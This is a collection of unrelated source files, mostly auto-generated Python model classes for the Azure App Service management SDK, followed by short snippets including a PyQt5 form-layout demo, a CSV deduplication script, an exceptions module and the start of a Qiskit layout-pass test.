        'resource_type': {'key': 'resourceType', 'type': 'str'},
        'sku': {'key': 'sku', 'type': 'SkuDescription'},
        'capacity': {'key': 'capacity', 'type': 'SkuCapacity'},
    }

    def __init__(self, **kwargs):
        super(SkuInfo, self).__init__(**kwargs)
        self.resource_type = kwargs.get('resource_type')
        self.sku = kwargs.get('sku')
        self.capacity = kwargs.get('capacity')
class SkuInfoCollection(msrest.serialization.Model):
    """A paged collection of SKU information.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. The resources on this page.
    :type value: list[~azure.mgmt.web.v2016_09_01.models.SkuInfo]
    :ivar next_link: Link to the next page of resources.
    :vartype next_link: str
    """

    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[SkuInfo]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(SkuInfoCollection, self).__init__(**kwargs)
        # 'value' is required: a missing keyword raises KeyError by design.
        self.value = kwargs['value']
        # Read-only; populated by the service.
        self.next_link = None
class SlotSwapStatus(msrest.serialization.Model):
    """Status of the last successful slot swap operation.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar timestamp_utc: Time the last successful slot swap completed.
    :vartype timestamp_utc: ~datetime.datetime
    :ivar source_slot_name: Source slot of the last swap operation.
    :vartype source_slot_name: str
    :ivar destination_slot_name: Destination slot of the last swap operation.
    :vartype destination_slot_name: str
    """

    _validation = {
        'timestamp_utc': {'readonly': True},
        'source_slot_name': {'readonly': True},
        'destination_slot_name': {'readonly': True},
    }

    _attribute_map = {
        'timestamp_utc': {'key': 'timestampUtc', 'type': 'iso-8601'},
        'source_slot_name': {'key': 'sourceSlotName', 'type': 'str'},
        'destination_slot_name': {'key': 'destinationSlotName', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(SlotSwapStatus, self).__init__(**kwargs)
        # Every attribute is read-only and populated by the service.
        self.timestamp_utc = None
        self.source_slot_name = None
        self.destination_slot_name = None
class SlowRequestsBasedTrigger(msrest.serialization.Model):
    """Auto-heal trigger based on request execution time.

    :param time_taken: Time taken.
    :type time_taken: str
    :param count: Request count.
    :type count: int
    :param time_interval: Time interval.
    :type time_interval: str
    """

    _attribute_map = {
        'time_taken': {'key': 'timeTaken', 'type': 'str'},
        'count': {'key': 'count', 'type': 'int'},
        'time_interval': {'key': 'timeInterval', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(SlowRequestsBasedTrigger, self).__init__(**kwargs)
        self.time_taken = kwargs.get('time_taken')
        self.count = kwargs.get('count')
        self.time_interval = kwargs.get('time_interval')
class SnapshotRecoveryRequest(ProxyOnlyResource):
    """Details about an app recovery operation.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :param snapshot_time: Point in time at which the app recovery should be
     attempted, formatted as a DateTime string.
    :type snapshot_time: str
    :param recovery_target: The web app that snapshot contents will be written to.
    :type recovery_target: ~azure.mgmt.web.v2016_09_01.models.SnapshotRecoveryTarget
    :param overwrite: If ``true``, the recovery operation can overwrite the
     source app; otherwise ``false``.
    :type overwrite: bool
    :param recover_configuration: If true, site configuration is reverted in
     addition to content.
    :type recover_configuration: bool
    :param ignore_conflicting_host_names: If true, custom hostname conflicts
     are ignored when recovering to a target web app. Only needed when
     RecoverConfiguration is enabled.
    :type ignore_conflicting_host_names: bool
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'snapshot_time': {'key': 'properties.snapshotTime', 'type': 'str'},
        'recovery_target': {'key': 'properties.recoveryTarget', 'type': 'SnapshotRecoveryTarget'},
        'overwrite': {'key': 'properties.overwrite', 'type': 'bool'},
        'recover_configuration': {'key': 'properties.recoverConfiguration', 'type': 'bool'},
        'ignore_conflicting_host_names': {'key': 'properties.ignoreConflictingHostNames', 'type': 'bool'},
    }

    def __init__(self, **kwargs):
        super(SnapshotRecoveryRequest, self).__init__(**kwargs)
        self.snapshot_time = kwargs.get('snapshot_time')
        self.recovery_target = kwargs.get('recovery_target')
        self.overwrite = kwargs.get('overwrite')
        self.recover_configuration = kwargs.get('recover_configuration')
        self.ignore_conflicting_host_names = kwargs.get('ignore_conflicting_host_names')
class SnapshotRecoveryTarget(msrest.serialization.Model):
    """The web app that snapshot contents will be written to.

    :param location: Geographical location of the target web app,
     e.g. SouthEastAsia, SouthCentralUS.
    :type location: str
    :param id: ARM resource ID of the target app:
     /subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{siteName}
     for production slots, and
     /subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{siteName}/slots/{slotName}
     for other slots.
    :type id: str
    """

    _attribute_map = {
        'location': {'key': 'location', 'type': 'str'},
        'id': {'key': 'id', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(SnapshotRecoveryTarget, self).__init__(**kwargs)
        self.location = kwargs.get('location')
        self.id = kwargs.get('id')
class StampCapacity(msrest.serialization.Model):
    """Stamp capacity information.

    :param name: Name of the stamp.
    :type name: str
    :param available_capacity: Available capacity (# of machines, bytes of storage, etc.).
    :type available_capacity: long
    :param total_capacity: Total capacity (# of machines, bytes of storage, etc.).
    :type total_capacity: long
    :param unit: Name of the unit.
    :type unit: str
    :param compute_mode: Shared/dedicated workers. Possible values include:
     "Shared", "Dedicated", "Dynamic".
    :type compute_mode: str or ~azure.mgmt.web.v2016_09_01.models.ComputeModeOptions
    :param worker_size: Size of the machines. Possible values include:
     "Default", "Small", "Medium", "Large", "D1", "D2", "D3".
    :type worker_size: str or ~azure.mgmt.web.v2016_09_01.models.WorkerSizeOptions
    :param worker_size_id: Size ID of machines: 0 - Small, 1 - Medium, 2 - Large.
    :type worker_size_id: int
    :param exclude_from_capacity_allocation: If ``true``, this includes basic
     apps; basic apps are not used for capacity allocation.
    :type exclude_from_capacity_allocation: bool
    :param is_applicable_for_all_compute_modes: ``true`` if capacity is
     applicable for all apps; otherwise ``false``.
    :type is_applicable_for_all_compute_modes: bool
    :param site_mode: Shared or Dedicated.
    :type site_mode: str
    """

    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'available_capacity': {'key': 'availableCapacity', 'type': 'long'},
        'total_capacity': {'key': 'totalCapacity', 'type': 'long'},
        'unit': {'key': 'unit', 'type': 'str'},
        'compute_mode': {'key': 'computeMode', 'type': 'str'},
        'worker_size': {'key': 'workerSize', 'type': 'str'},
        'worker_size_id': {'key': 'workerSizeId', 'type': 'int'},
        'exclude_from_capacity_allocation': {'key': 'excludeFromCapacityAllocation', 'type': 'bool'},
        'is_applicable_for_all_compute_modes': {'key': 'isApplicableForAllComputeModes', 'type': 'bool'},
        'site_mode': {'key': 'siteMode', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(StampCapacity, self).__init__(**kwargs)
        self.name = kwargs.get('name')
        self.available_capacity = kwargs.get('available_capacity')
        self.total_capacity = kwargs.get('total_capacity')
        self.unit = kwargs.get('unit')
        self.compute_mode = kwargs.get('compute_mode')
        self.worker_size = kwargs.get('worker_size')
        self.worker_size_id = kwargs.get('worker_size_id')
        self.exclude_from_capacity_allocation = kwargs.get('exclude_from_capacity_allocation')
        self.is_applicable_for_all_compute_modes = kwargs.get('is_applicable_for_all_compute_modes')
        self.site_mode = kwargs.get('site_mode')
class StampCapacityCollection(msrest.serialization.Model):
    """A paged collection of stamp capacities.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. The resources on this page.
    :type value: list[~azure.mgmt.web.v2016_09_01.models.StampCapacity]
    :ivar next_link: Link to the next page of resources.
    :vartype next_link: str
    """

    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[StampCapacity]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(StampCapacityCollection, self).__init__(**kwargs)
        # 'value' is required: a missing keyword raises KeyError by design.
        self.value = kwargs['value']
        # Read-only; populated by the service.
        self.next_link = None
class StatusCodesBasedTrigger(msrest.serialization.Model):
    """Auto-heal trigger based on HTTP status code.

    :param status: HTTP status code.
    :type status: int
    :param sub_status: Request sub-status.
    :type sub_status: int
    :param win32_status: Win32 error code.
    :type win32_status: int
    :param count: Request count.
    :type count: int
    :param time_interval: Time interval.
    :type time_interval: str
    """

    _attribute_map = {
        'status': {'key': 'status', 'type': 'int'},
        'sub_status': {'key': 'subStatus', 'type': 'int'},
        'win32_status': {'key': 'win32Status', 'type': 'int'},
        'count': {'key': 'count', 'type': 'int'},
        'time_interval': {'key': 'timeInterval', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(StatusCodesBasedTrigger, self).__init__(**kwargs)
        self.status = kwargs.get('status')
        self.sub_status = kwargs.get('sub_status')
        self.win32_status = kwargs.get('win32_status')
        self.count = kwargs.get('count')
        self.time_interval = kwargs.get('time_interval')
class Usage(ProxyOnlyResource):
    """Usage of the quota resource.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :ivar display_name: Friendly name shown in the UI.
    :vartype display_name: str
    :ivar name_properties_name: Name of the quota.
    :vartype name_properties_name: str
    :ivar resource_name: Name of the quota resource.
    :vartype resource_name: str
    :ivar unit: Units of measurement for the quota resource.
    :vartype unit: str
    :ivar current_value: Current value of the resource counter.
    :vartype current_value: long
    :ivar limit: The resource limit.
    :vartype limit: long
    :ivar next_reset_time: Next reset time for the resource counter.
    :vartype next_reset_time: ~datetime.datetime
    :ivar compute_mode: Compute mode used for this usage. Possible values
     include: "Shared", "Dedicated", "Dynamic".
    :vartype compute_mode: str or ~azure.mgmt.web.v2016_09_01.models.ComputeModeOptions
    :ivar site_mode: Site mode used for this usage.
    :vartype site_mode: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'display_name': {'readonly': True},
        'name_properties_name': {'readonly': True},
        'resource_name': {'readonly': True},
        'unit': {'readonly': True},
        'current_value': {'readonly': True},
        'limit': {'readonly': True},
        'next_reset_time': {'readonly': True},
        'compute_mode': {'readonly': True},
        'site_mode': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'display_name': {'key': 'properties.displayName', 'type': 'str'},
        'name_properties_name': {'key': 'properties.name', 'type': 'str'},
        'resource_name': {'key': 'properties.resourceName', 'type': 'str'},
        'unit': {'key': 'properties.unit', 'type': 'str'},
        'current_value': {'key': 'properties.currentValue', 'type': 'long'},
        'limit': {'key': 'properties.limit', 'type': 'long'},
        'next_reset_time': {'key': 'properties.nextResetTime', 'type': 'iso-8601'},
        'compute_mode': {'key': 'properties.computeMode', 'type': 'str'},
        'site_mode': {'key': 'properties.siteMode', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(Usage, self).__init__(**kwargs)
        # All quota properties are read-only and populated by the service.
        self.display_name = None
        self.name_properties_name = None
        self.resource_name = None
        self.unit = None
        self.current_value = None
        self.limit = None
        self.next_reset_time = None
        self.compute_mode = None
        self.site_mode = None
class UsageCollection(msrest.serialization.Model):
    """A paged collection of usages.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. The resources on this page.
    :type value: list[~azure.mgmt.web.v2016_09_01.models.Usage]
    :ivar next_link: Link to the next page of resources.
    :vartype next_link: str
    """

    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[Usage]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(UsageCollection, self).__init__(**kwargs)
        # 'value' is required: a missing keyword raises KeyError by design.
        self.value = kwargs['value']
        # Read-only; populated by the service.
        self.next_link = None
class VirtualApplication(msrest.serialization.Model):
    """Virtual application in an app.

    :param virtual_path: Virtual path.
    :type virtual_path: str
    :param physical_path: Physical path.
    :type physical_path: str
    :param preload_enabled: ``true`` if preloading is enabled; otherwise ``false``.
    :type preload_enabled: bool
    :param virtual_directories: Virtual directories for the virtual application.
    :type virtual_directories: list[~azure.mgmt.web.v2016_09_01.models.VirtualDirectory]
    """

    _attribute_map = {
        'virtual_path': {'key': 'virtualPath', 'type': 'str'},
        'physical_path': {'key': 'physicalPath', 'type': 'str'},
        'preload_enabled': {'key': 'preloadEnabled', 'type': 'bool'},
        'virtual_directories': {'key': 'virtualDirectories', 'type': '[VirtualDirectory]'},
    }

    def __init__(self, **kwargs):
        super(VirtualApplication, self).__init__(**kwargs)
        self.virtual_path = kwargs.get('virtual_path')
        self.physical_path = kwargs.get('physical_path')
        self.preload_enabled = kwargs.get('preload_enabled')
        self.virtual_directories = kwargs.get('virtual_directories')
class VirtualDirectory(msrest.serialization.Model):
    """Directory for a virtual application.

    :param virtual_path: Path to the virtual application.
    :type virtual_path: str
    :param physical_path: Physical path.
    :type physical_path: str
    """

    _attribute_map = {
        'virtual_path': {'key': 'virtualPath', 'type': 'str'},
        'physical_path': {'key': 'physicalPath', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(VirtualDirectory, self).__init__(**kwargs)
        self.virtual_path = kwargs.get('virtual_path')
        self.physical_path = kwargs.get('physical_path')
class VirtualIPMapping(msrest.serialization.Model):
    """Virtual IP mapping.

    :param virtual_ip: Virtual IP address.
    :type virtual_ip: str
    :param internal_http_port: Internal HTTP port.
    :type internal_http_port: int
    :param internal_https_port: Internal HTTPS port.
    :type internal_https_port: int
    :param in_use: Whether the virtual IP mapping is in use.
    :type in_use: bool
    """

    _attribute_map = {
        'virtual_ip': {'key': 'virtualIP', 'type': 'str'},
        'internal_http_port': {'key': 'internalHttpPort', 'type': 'int'},
        'internal_https_port': {'key': 'internalHttpsPort', 'type': 'int'},
        'in_use': {'key': 'inUse', 'type': 'bool'},
    }

    def __init__(self, **kwargs):
        super(VirtualIPMapping, self).__init__(**kwargs)
        self.virtual_ip = kwargs.get('virtual_ip')
        self.internal_http_port = kwargs.get('internal_http_port')
        self.internal_https_port = kwargs.get('internal_https_port')
        self.in_use = kwargs.get('in_use')
class VirtualNetworkProfile(msrest.serialization.Model):
    """Specification for using a Virtual Network.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :param id: Resource id of the Virtual Network.
    :type id: str
    :ivar name: Name of the Virtual Network (read-only).
    :vartype name: str
    :ivar type: Resource type of the Virtual Network (read-only).
    :vartype type: str
    :param subnet: Subnet within the Virtual Network.
    :type subnet: str
    """

    _validation = {
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'subnet': {'key': 'subnet', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(VirtualNetworkProfile, self).__init__(**kwargs)
        self.id = kwargs.get('id')
        # Read-only; populated by the service.
        self.name = None
        self.type = None
        self.subnet = kwargs.get('subnet')
class VnetGateway(ProxyOnlyResource):
    """The Virtual Network gateway contract, used to give the Virtual Network
    gateway access to the VPN package.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :param vnet_name: The Virtual Network name.
    :type vnet_name: str
    :param vpn_package_uri: The URI where the VPN package can be downloaded.
    :type vpn_package_uri: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'vnet_name': {'key': 'properties.vnetName', 'type': 'str'},
        'vpn_package_uri': {'key': 'properties.vpnPackageUri', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(VnetGateway, self).__init__(**kwargs)
        self.vnet_name = kwargs.get('vnet_name')
        self.vpn_package_uri = kwargs.get('vpn_package_uri')
class VnetInfo(ProxyOnlyResource):
    """Virtual Network information contract.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :param vnet_resource_id: The Virtual Network's resource ID.
    :type vnet_resource_id: str
    :ivar cert_thumbprint: The client certificate thumbprint.
    :vartype cert_thumbprint: str
    :param cert_blob: A certificate file (.cer) blob containing the public key
     of the private key used to authenticate a Point-To-Site VPN connection.
    :type cert_blob: bytearray
    :ivar routes: The routes that this Virtual Network connection uses.
    :vartype routes: list[~azure.mgmt.web.v2016_09_01.models.VnetRoute]
    :ivar resync_required: ``true`` if a resync is required; otherwise ``false``.
    :vartype resync_required: bool
    :param dns_servers: DNS servers to be used by this Virtual Network, as a
     comma-separated list of IP addresses.
    :type dns_servers: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'cert_thumbprint': {'readonly': True},
        'routes': {'readonly': True},
        'resync_required': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'vnet_resource_id': {'key': 'properties.vnetResourceId', 'type': 'str'},
        'cert_thumbprint': {'key': 'properties.certThumbprint', 'type': 'str'},
        'cert_blob': {'key': 'properties.certBlob', 'type': 'bytearray'},
        'routes': {'key': 'properties.routes', 'type': '[VnetRoute]'},
        'resync_required': {'key': 'properties.resyncRequired', 'type': 'bool'},
        'dns_servers': {'key': 'properties.dnsServers', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(VnetInfo, self).__init__(**kwargs)
        self.vnet_resource_id = kwargs.get('vnet_resource_id')
        # Read-only; populated by the service.
        self.cert_thumbprint = None
        self.cert_blob = kwargs.get('cert_blob')
        # Read-only; populated by the service.
        self.routes = None
        self.resync_required = None
        self.dns_servers = kwargs.get('dns_servers')
class VnetRoute(ProxyOnlyResource):
    """Virtual Network route contract used to pass routing information for a
    Virtual Network.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :param vnet_route_name: The name of this route. Only returned by the
     server; clients do not need to set it.
    :type vnet_route_name: str
    :param start_address: The starting address for this route. May include a
     CIDR notation, in which case the end address must not be specified.
    :type start_address: str
    :param end_address: The ending address for this route. Must be omitted
     when the start address is given in CIDR notation.
    :type end_address: str
    :param route_type: The type of route:
     DEFAULT - routes to the local address ranges specified by RFC1918;
     INHERITED - routes inherited from the real Virtual Network routes;
     STATIC - static route set on the app only.
     These values are used for syncing an app's routes with those from a
     Virtual Network. Possible values include: "DEFAULT", "INHERITED", "STATIC".
    :type route_type: str or ~azure.mgmt.web.v2016_09_01.models.RouteType
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'vnet_route_name': {'key': 'properties.name', 'type': 'str'},
        'start_address': {'key': 'properties.startAddress', 'type': 'str'},
        'end_address': {'key': 'properties.endAddress', 'type': 'str'},
        'route_type': {'key': 'properties.routeType', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(VnetRoute, self).__init__(**kwargs)
        self.vnet_route_name = kwargs.get('vnet_route_name')
        self.start_address = kwargs.get('start_address')
        self.end_address = kwargs.get('end_address')
        self.route_type = kwargs.get('route_type')
class WebAppCollection(msrest.serialization.Model):
    """A paged collection of App Service apps.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. The resources on this page.
    :type value: list[~azure.mgmt.web.v2016_09_01.models.Site]
    :ivar next_link: Link to the next page of resources.
    :vartype next_link: str
    """

    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[Site]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(WebAppCollection, self).__init__(**kwargs)
        # 'value' is required: a missing keyword raises KeyError by design.
        self.value = kwargs['value']
        # Read-only; populated by the service.
        self.next_link = None
class WorkerPool(msrest.serialization.Model):
    """Worker pool of an App Service Environment.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :param worker_size_id: Worker size ID for referencing this worker pool.
    :type worker_size_id: int
    :param compute_mode: Shared or dedicated app hosting. Possible values
     include: "Shared", "Dedicated", "Dynamic".
    :type compute_mode: str or ~azure.mgmt.web.v2016_09_01.models.ComputeModeOptions
    :param worker_size: VM size of the worker pool instances.
    :type worker_size: str
    :param worker_count: Number of instances in the worker pool.
    :type worker_count: int
    :ivar instance_names: Names of all instances in the worker pool (read-only).
    :vartype instance_names: list[str]
    """

    _validation = {
        'instance_names': {'readonly': True},
    }

    _attribute_map = {
        'worker_size_id': {'key': 'workerSizeId', 'type': 'int'},
        'compute_mode': {'key': 'computeMode', 'type': 'str'},
        'worker_size': {'key': 'workerSize', 'type': 'str'},
        'worker_count': {'key': 'workerCount', 'type': 'int'},
        'instance_names': {'key': 'instanceNames', 'type': '[str]'},
    }

    def __init__(self, **kwargs):
        super(WorkerPool, self).__init__(**kwargs)
        self.worker_size_id = kwargs.get('worker_size_id')
        self.compute_mode = kwargs.get('compute_mode')
        self.worker_size = kwargs.get('worker_size')
        self.worker_count = kwargs.get('worker_count')
        # Read-only; populated by the service.
        self.instance_names = None
class WorkerPoolCollection(msrest.serialization.Model):
    """A paged collection of worker pools.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. The resources on this page.
    :type value: list[~azure.mgmt.web.v2016_09_01.models.WorkerPoolResource]
    :ivar next_link: Link to the next page of resources.
    :vartype next_link: str
    """

    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[WorkerPoolResource]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(WorkerPoolCollection, self).__init__(**kwargs)
        # 'value' is required: a missing keyword raises KeyError by design.
        self.value = kwargs['value']
        # Read-only; populated by the service.
        self.next_link = None
class WorkerPoolResource(ProxyOnlyResource):
    """Worker pool of an App Service Environment ARM resource.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :param sku: Description of a SKU for a scalable resource.
    :type sku: ~azure.mgmt.web.v2016_09_01.models.SkuDescription
    :param worker_size_id: Worker size ID for referencing this worker pool.
    :type worker_size_id: int
    :param compute_mode: Shared or dedicated app hosting. Possible values
     include: "Shared", "Dedicated", "Dynamic".
    :type compute_mode: str or ~azure.mgmt.web.v2016_09_01.models.ComputeModeOptions
    :param worker_size: VM size of the worker pool instances.
    :type worker_size: str
    :param worker_count: Number of instances in the worker pool.
    :type worker_count: int
    :ivar instance_names: Names of all instances in the worker pool (read-only).
    :vartype instance_names: list[str]
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'instance_names': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'sku': {'key': 'sku', 'type': 'SkuDescription'},
        'worker_size_id': {'key': 'properties.workerSizeId', 'type': 'int'},
        'compute_mode': {'key': 'properties.computeMode', 'type': 'str'},
        'worker_size': {'key': 'properties.workerSize', 'type': 'str'},
        'worker_count': {'key': 'properties.workerCount', 'type': 'int'},
        'instance_names': {'key': 'properties.instanceNames', 'type': '[str]'},
    }

    def __init__(self, **kwargs):
        super(WorkerPoolResource, self).__init__(**kwargs)
        self.sku = kwargs.get('sku')
        self.worker_size_id = kwargs.get('worker_size_id')
        self.compute_mode = kwargs.get('compute_mode')
        self.worker_size = kwargs.get('worker_size')
        self.worker_count = kwargs.get('worker_count')
        # Read-only; populated by the service.
        self.instance_names = None
| StarcoderdataPython |
3213948 | #!/usr/bin/env python
import my_module2

# Fixed: the original used the Python 2 `print` statement, which is a
# SyntaxError under Python 3; use the print() function instead.
print('Hello from my_modules.py')
11271800 | """Collection of all exception classes
"""
class HdtopException(Exception):
    """Root of the hdtop exception hierarchy; catch this to handle any hdtop error."""
class ConfigValueError(HdtopException, ValueError):
    """Raised when a configuration value is not allowed.

    ``args[0]`` is the offending value; an optional ``args[1]`` is an
    iterable of accepted values appended to the message.
    """

    def __str__(self) -> str:
        value = self.args[0]
        if len(self.args) != 2:
            return f"Invalid configuration value: {value}"
        allowed = ", ".join(self.args[1])
        return f"Invalid configuration value: {value}. Expected values: {allowed}"
class MissingConfigurationError(ConfigValueError):
    """Raised when a required configuration key is absent."""

    def __str__(self) -> str:
        key = self.args[0]
        return (
            f"Config `{key}` is required. "
            f"Use `hdtop config {key} <value>` to set one."
        )
| StarcoderdataPython |
8179053 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import logging

# Fixed the placeholder typo '% s' -> '%s' (the printf ' ' flag is a no-op for
# %s conversions, so output is unchanged, but the conventional form is '%s').
# Lazy %-style arguments defer formatting until the record is actually emitted.
logging.warning('%s before you %s', 'look', 'leap')
| StarcoderdataPython |
1975627 | <filename>scripts/uniq_hash.py
#!/usr/bin/python3
import fileinput
import sys
f = fileinput.input()
header = next(f)
sys.stdout.write(header)
h_index = header.split(',').index('hash')
seen = set()
for line in f:
h = line.split(',')[h_index]
if h in seen: continue
seen.add(h)
sys.stdout.write(line)
| StarcoderdataPython |
from itertools import accumulate

# Compute the running (prefix) sums of `nums`: [1, 1+2, 1+2+3, ...].
# Fixed: the original filled a zero-initialized list via new_nums[i - 1],
# which only produced the right answer because new_nums[-1] wrapped around
# to a still-zero last element on the first iteration — a fragile accident.
# itertools.accumulate expresses the intent directly.
nums = [1, 2, 3, 4]
new_nums = list(accumulate(nums))
print(new_nums)
| StarcoderdataPython |
6519812 | <reponame>seekindark/helloworld
import sys
from PyQt5.QtWidgets import QApplication ,QWidget ,QFormLayout , \
QLineEdit, QLabel, QPushButton,QRadioButton
from PyQt5.QtCore import Qt
class Winform(QWidget):
    """Demo window showing form-layout management with QFormLayout."""

    def __init__(self, parent=None):
        super(Winform, self).__init__(parent)
        self.setWindowTitle("窗体布局管理例子")
        self.resize(400, 100)

        form_layout = QFormLayout()

        label_one = QLabel("标签1")
        edit_one = QLineEdit()
        label_two = QLabel("标签2")
        edit_two = QLineEdit()
        label_three = QLabel("标签3")
        edit_three = QLineEdit()

        form_layout.addRow(label_one, edit_one)
        form_layout.addRow(label_two, edit_two)
        form_layout.addRow(label_three, edit_three)
        form_layout.addRow('xxxssssssssssdddd', QLineEdit())
        form_layout.addRow(QPushButton('aaa'), QRadioButton('bbb'))

        # Useful on small screens: when a label and its field don't fit on
        # one row, the field wraps to the next line and the label gets a
        # whole row to itself.
        form_layout.setRowWrapPolicy(QFormLayout.WrapLongRows)
        # Right-align the labels.
        form_layout.setLabelAlignment(Qt.AlignRight)
        self.setLayout(form_layout)
if __name__ == "__main__":
    # Standard Qt bootstrap: create the application, show the demo window,
    # and hand control to the event loop until the window is closed.
    app = QApplication(sys.argv)
    window = Winform()
    window.show()
    sys.exit(app.exec_())
358509 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test the VF2Layout pass"""
import retworkx
from qiskit import QuantumRegister, QuantumCircuit
from qiskit.transpiler import CouplingMap, Layout, TranspilerError
from qiskit.transpiler.passes.layout import vf2_utils
from qiskit.transpiler.passes.layout.vf2_post_layout import VF2PostLayout, VF2PostLayoutStopReason
from qiskit.converters import circuit_to_dag
from qiskit.test import QiskitTestCase
from qiskit.test.mock import FakeYorktown, FakeLima, FakeLimaV2, FakeYorktownV2
from qiskit.circuit import Qubit
from qiskit.compiler.transpiler import transpile
class TestVF2PostLayout(QiskitTestCase):
    """Tests the VF2PostLayout pass in its default (strict-direction) mode."""
    # Fixed seed so transpilation and the pass's internal randomization are
    # deterministic across runs.
    seed = 42
